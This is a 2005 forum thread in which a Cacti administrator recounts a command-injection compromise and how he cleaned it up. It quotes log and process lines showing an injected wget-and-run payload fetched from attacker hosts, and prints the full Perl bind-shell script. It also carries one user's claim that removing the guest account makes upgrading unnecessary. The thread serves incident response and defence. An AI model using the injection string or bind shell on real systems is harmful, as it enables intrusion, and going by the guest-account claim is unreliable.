Real World Example of Injection Exploit

Post general support questions here that do not specifically fall into the Linux or Windows categories.

Moderators: Developers, Moderators

Post Reply
comprock
Posts: 3
Joined: Fri Jun 24, 2005 1:22 pm

Real World Example of Injection Exploit

Post by comprock »

In the past 48 hours, I was subjected to a command line injection exploit. The first time, server load incredibly spiked to 400. This last time, since I was more aware that there was an issue, but not sure what yet, the load rising to 2.5 caught my eye.

I found the process by using top and typing 'P' to sort by CPU usage. Upon spotting the errant Perl processes I killed them with 'kill -9 process_id1 process_id2".

Alternate method by grepping ps is below.

Next by looking at "/tmp/shell.pl" I found that a socket was being created on 14141. In another shell.pl attempt, socket 4444 was being used.

Checking 'netstat -l | grep -e "14141\|4444"' indeed a socket was open and listening.

As I don't know how to close the sockets, I'm awaiting my data center to let me know how to do it.

In grepping my Apache logs, see below, I found "shell.pl" in them and traced it back to Cacti. Once I checked the forums here, I found that 0.8.6d had an injection flaw. I then went to my cacti directory and ran "cvs up -rRELEASE_0_8_6e" to update it.

After upgrading, diff your includes/config.php with includes/config.php.dist to find about any changes such as includes, variable initializers, and versions.

For me being a vi user, I used "vimdiff config.php config.php.dist" to quickly copy one line or so of code from one config to another.

Next, visit your Cacti install URL and upgrade. For me it was 0.8.6d to 0.8.6e.

Though not specifically stated, I went into my Cacti Console > System Utilities and cleared both Poller Cache and Log file.

Then go visit your normal Cacti graph URL to see if any errors show.

Lastly, to help make me aware of these undesired openings of Internet service sockets in the future. I downloaded and installed LSM (Linux Socket Monitor) from http://rfxnetworks.com/lsm.php. This essentially takes a baseline shot of current open sockets and default every 10 minutes reports via email if there's been a change.

Good luck and I hope this helps others.

Michael
http://cannonbose.com/cacti/graph_view. ... on=preview

Code: Select all

Processes - "ps -aux | grep shell"

105:nobody   11101  0.0  0.0  2172  952 ?        S    Jun23   0:00 sh -c /usr/local/bin/rrdtool graph -  --imgformat=PNG  --start=?cd /tmp;wget http://albythebest.altervista.org/shell.pl;chmod 777 shell.pl;perl shell.pl?  --end=-300  --title="Charley - CPU Usage"  --rigid  --base=1000  --height=120 --width=500  --alt-auto

120:nobody   16433  0.0  0.0  2172  968 ?        S    03:20   0:00 sh -c /usr/local/bin/rrdtool graph -  --imgformat=PNG  --start=?cd /tmp;wget http://219.238.232.208/pub/I386/shell.pl;chmod 777 shell.pl;perl shell.pl?  --end=-300  --title="Charley - CPU Usage"  --rigid  --base=1000  --height=120 --width=500  --alt-autosc

root@delta:/usr/local/cacti/include # netstat -l | grep -e "14141\|4444"
warning, got duplicate tcp line.
warning, got duplicate tcp line.
46:tcp        0      0 *:14141                     *:*                         LISTEN      

Apache Log

root@delta:/usr/local/apache/logs # grep -rn "shell.pl" access_log 
59489:200.222.106.252 - - [23/Jun/2005:09:58:59 -0500] "GET /cacti/graph_image.php?local_graph_id=50&graph_start=%0acd%20/tmp;wget%20http://albythebest.altervista.org/shell.pl;chmod%20777%20shell.pl;perl%20shell.pl%0a HTTP/1.1" 200 128
shell.pl

Code: Select all

#!/usr/bin/perl
use Socket;
$port=14141;
$proto=getprotobyname('tcp');
$cmd="lpd";
$system='/bin/sh';
$0=$cmd;
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
   open(STDIN, ">&CLIENT");
   open(STDOUT, ">&CLIENT");
   open(STDERR, ">&CLIENT");
   system($system);
   close(STDIN);
   close(STDOUT);
   close(STDERR);
}
comprock
Posts: 3
Joined: Fri Jun 24, 2005 1:22 pm

Validation Test Results

Post by comprock »

Also, just to make sure that I'm really protected from this injection error, I loaded "http://www.cannonbose.com/cacti/graph_i ... hell.pl%0a" into my browser and was welcomed with a nice "validation error" message.

One more exploit hole down.

Thanks Cacti guys!
comprock
Posts: 3
Joined: Fri Jun 24, 2005 1:22 pm

Socket Closing

Post by comprock »

In rereading my LSM email below. I noticed that process ids were given at the end of the open socket lines.
From: root@delta.cannonbose.com
Subject: LSM Alert on delta.cannonbose.com
Date: June 24, 2005 13:12:00 CDT
To: server@cannonbose.com

This is an automated alert generated from delta.cannonbose.com. This alert is to
notify the addressed users of new server sockets. New server sockets can
indicate server-software that has been started on your host, or otherwise
be an indication to malicious activity. It is advised to review this alert
and investigate if needed.

Following is a summary of new Internet Server Sockets:
tcp 0 0 0.0.0.0:14141 0.0.0.0:* LISTEN 16437/lpd
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN 11105/lpd

Following is a summary of a new Unix Domain Sockets:
no changes to Unix Domain Sockets
With those process ids, you can run "kill -9 16437 11105" to close the listening sockets.

Running 'netstat -npl | grep -e "14141\|4444"' shows that I've got no open sockets on those ports.

If you notice, my netstat command changed slightly. Adding commands np gives you the long output similar to that in the LSM email below. Thereby helping you figure out which process to kill.

Inclosing to give an idea of what healthy ports it's okay to have open, here's mine.

Code: Select all

0.0.0.0:110 cppop
0.0.0.0:111 portsentry
0.0.0.0:143 xinetd
0.0.0.0:199 snmpd
0.0.0.0:1 portsentry
0.0.0.0:2082 cpsrvd
0.0.0.0:2083 stunnel-4.04lo
0.0.0.0:2086 cpsrvd
0.0.0.0:2087 stunnel-4.04lo
0.0.0.0:2095 cpsrvd
0.0.0.0:2096 stunnel-4.04lo
0.0.0.0:22 sshd
0.0.0.0:2401 xinetd
0.0.0.0:25 exim
0.0.0.0:3306 mysqld
0.0.0.0:443 httpd
0.0.0.0:465 exim
0.0.0.0:808 VVAgent
0.0.0.0:80 httpd
0.0.0.0:993 stunnel-4.04lo
0.0.0.0:995 stunnel-4.04lo
0.0.0.0:9999 urchinwebd
User avatar
rony
Developer/Forum Admin
Posts: 6022
Joined: Mon Nov 17, 2003 6:35 pm
Location: Michigan, USA
Contact:

Post by rony »

What amazes me is that Security Focus released a exploit example and boom, people are getting hit. And what is more amazing, it was released yesterday.

We released the updated version of cacti on Monday, and Thursday there is an exploit for the bug. :(

As Ian said, as more people us it, more problems like this are found. Which is a good thing and a bad thing.

I suggest that if you have an externally accessable cacti installation that you update it immediately.
[size=117][i][b]Tony Roman[/b][/i][/size]
[size=84][i]Experience is what causes a person to make new mistakes instead of old ones.[/i][/size]
[size=84][i]There are only 3 way to complete a project: Good, Fast or Cheap, pick two.[/i][/size]
[size=84][i]With age comes wisdom, what you choose to do with it determines whether or not you are wise.[/i][/size]
mindsick
Posts: 10
Joined: Fri Apr 01, 2005 5:04 am

Post by mindsick »

i've discovered how to make this command to stop working:

http://cannonbose.com/cacti/graph_view. ... on=preview

the vulnerability is generated because nobody is disabling the guest account from cacti standard instalation.
if u erase that user u don't need to do any upgrade.

try this issue and tell me if there is ok.
i've tried to exploit my machines after that change and got no effect.
no one can.
mindsick
Posts: 10
Joined: Fri Apr 01, 2005 5:04 am

Post by mindsick »

oh, i've forgot something important. :D
verify the /var/tmp and /tmp directory because some stupid IRC script Kiddies maybe they put some IRC Bots, Bouncers and other sh*ts stuff. they use ussualy directories like ".. "; "\ /"; ".a"; "init" and sniffers, so u might check that olso, yesterday i had an surprise from some stupid romanian irc kiddies with theys bots on Undernet IRC, u can check if your ip is present there.

succes. :evil:
no one can.
Post Reply

Who is online

Users browsing this forum: No registered users and 0 guests